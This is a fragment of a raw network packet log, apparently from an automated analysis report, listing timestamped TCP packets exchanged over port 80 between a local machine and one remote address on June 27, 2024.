                                                                Jun 27, 2024 05:58:05.539163113 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.539175034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.539186001 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.539197922 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.539201021 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.539221048 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.539267063 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.543939114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.543956041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.543996096 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.544015884 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.544080973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.544102907 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.544118881 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.544120073 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.544140100 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.544159889 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.544289112 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.544306993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.544323921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.544329882 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.544341087 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.544377089 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.548975945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.549029112 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.549037933 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.549076080 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.549180031 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.549191952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.549202919 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.549216032 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.549237013 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.549441099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.549453020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.549463987 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.549475908 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.549478054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.549493074 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.549504995 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.549509048 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.549540997 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.549559116 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.549803972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.549814939 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.549827099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.549835920 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.549854040 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.549870014 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.549978018 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.549988031 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.549998045 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550009966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550018072 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.550024033 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550035954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.550038099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550052881 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550052881 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.550069094 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.550095081 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.550367117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550378084 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550390005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550400972 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.550403118 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550421953 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.550434113 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550438881 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.550472021 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.550843954 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550856113 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550865889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550879002 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550879002 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.550894022 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550898075 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.550909996 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550921917 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.550925970 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550939083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550951004 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.550952911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550966978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550978899 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.550983906 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.551002026 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.551017046 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.553220034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.553267002 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.553284883 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.553294897 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.553319931 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.553339958 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.553400993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.553415060 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.553427935 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.553437948 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.553442001 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.553463936 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.553491116 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.553683043 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.553694963 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.553708076 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.553719997 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.553719997 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.553735018 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.553755045 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.553916931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.553931952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.553942919 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.553956985 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.553956985 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.553981066 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.554032087 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.554167032 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.554177046 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.554187059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.554193974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.554204941 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.554210901 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.554220915 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.554228067 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.554255009 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.554507017 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.554523945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.554536104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.554547071 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.554582119 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.554641008 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.554678917 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.554775000 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.554788113 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.554807901 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.554811954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.554821968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.554827929 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.554836035 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.554847956 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.554851055 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.554867983 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.554873943 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.554884911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.554896116 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.554924965 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.555299997 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.555310011 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.555320024 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.555332899 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.555341005 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.555346012 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.555354118 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.555360079 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.555375099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.555383921 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.555391073 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.555413961 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.555428982 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.555828094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.555840015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.555850983 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.555865049 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.555870056 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.555879116 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.555881977 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.555891991 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.555907965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.555908918 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.555921078 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.555936098 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.555936098 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.555965900 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.555989027 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.556447983 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.556459904 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.556471109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.556493044 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.556494951 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.556505919 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.556518078 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.556519985 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.556535006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.556545973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.556548119 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.556560993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.556576014 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.556581974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.556592941 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.556596041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.556608915 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.556610107 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.556624889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.556641102 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.556668043 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.557300091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.557312012 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.557329893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.557343960 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.557343960 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.557358027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.557368994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.557374001 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.557384968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.557398081 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.557401896 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.557413101 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.557421923 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.557440042 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.557465076 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.625937939 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.625983953 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.625996113 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.626056910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.626075029 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.626192093 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.626204014 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.626214981 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.626224041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.626235008 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.626250982 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.626267910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.631071091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.631130934 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.631161928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.631174088 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.631198883 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.631225109 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.631326914 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.631337881 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.631347895 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.631373882 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.631390095 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.631548882 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.631596088 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.635267973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.635308981 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.635324001 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.635344028 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.635368109 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.635368109 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.635478020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.635492086 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.635504961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.635519028 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.635525942 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.635540009 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.635560989 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.635823965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.635838032 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.635853052 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.635865927 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.635869980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.635879040 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.635884047 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.635894060 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.635917902 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.636179924 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.636195898 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.636212111 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.636224031 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.636251926 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.636419058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.636432886 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.636445999 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.636461973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.636468887 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.636476040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.636493921 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.636514902 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.636548042 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.636703014 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.636717081 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.636744976 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.636770010 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.636817932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.636832952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.636856079 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.636873007 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.636962891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.636976957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.637001038 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.637006998 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.637015104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.637028933 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.637033939 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.637041092 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.637043953 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.637048960 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.637067080 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.637079000 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.637407064 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.637423992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.637437105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.637449980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.637450933 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.637465000 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.637466908 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.637479067 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.637490034 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.637494087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.637516022 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.637540102 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.640347004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.640362978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.640379906 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.640399933 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.640414953 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.640449047 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.640464067 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.640587091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.640713930 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.640728951 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.640743971 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.640760899 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.641000032 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.641016006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.641091108 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.641105890 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.641120911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.641136885 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.641151905 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.641166925 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.641182899 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.641187906 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641187906 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641189098 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641189098 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641189098 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641189098 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641189098 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641189098 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641222954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641222954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641222954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641222954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641222954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641222954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641580105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.641596079 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.641624928 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641644955 CEST4971180192.168.2.685.28.47.4
